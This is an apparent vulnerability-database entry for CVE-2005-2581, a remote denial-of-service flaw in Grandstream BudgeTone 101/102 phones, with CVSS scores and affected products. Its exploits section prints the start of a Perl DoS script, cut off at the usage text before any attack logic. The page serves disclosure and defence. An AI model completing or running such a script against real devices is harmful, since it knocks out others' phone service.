5
CVSSv2

CVE-2005-2581

Published: 16/08/2005 Updated: 18/10/2016
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Grandstream BudgeTone 101 and 102 running firmware 1.0.6.7 and possibly earlier versions, allows remote malicious users to cause a denial of service (device hang or reboot) via a large UDP packet to port 5060.

Vulnerable Product Search on Vulmon Subscribe to Product

grandstream budgetone 101

grandstream budgetone 102

Exploits

#!/usr/bin/perl # use IO::Socket; use Term::ANSIColor; ############################ U S A G E ################################### system ("clear"); print "\nGrandstream BT101/BT102 DoS\n"; print "written by pierre kroma (kroma\@syssde)\n\n"; if (!$ARGV[2]){ print qq~ Usage: perl grandstream-DoSpl -s <ip-addr> <udp-port> {-r/-s} &l ...